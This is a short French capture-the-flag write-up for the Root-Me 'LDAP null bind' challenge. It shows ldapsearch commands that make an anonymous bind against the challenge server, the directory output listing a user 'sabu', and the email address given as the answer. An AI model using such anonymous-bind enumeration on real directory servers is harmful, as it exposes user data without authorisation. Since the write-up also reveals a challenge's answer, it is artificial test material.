Aller au contenu

LDAP null bind

Lien du CTF


Solution

$ ldapsearch -h challenge01.root-me.org -x -p 54013 -b "dc=challenge01,dc=root-me,dc=org" -s base
┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -h challenge01.root-me.org -D '' -w '' -b "OU=anonymous,dc=challenge01,dc=root-me,dc=org" -p 54013                  53 ⨯
# extended LDIF
#
# LDAPv3
# base <OU=anonymous,dc=challenge01,dc=root-me,dc=org> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# anonymous, challenge01.root-me.org
dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
objectClass: organizationalUnit
ou: anonymous

# sabu, anonymous, challenge01.root-me.org
dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
objectClass: inetOrgPerson
objectClass: shadowAccount
uid: sabu
sn: sabu
cn: sabu
givenName: sabu
mail: sabu@anonops.org

# search result
search: 2
result: 0 Success

# numResponses: 3
# numEntries: 2

Adresse mail : sabu@anonops.org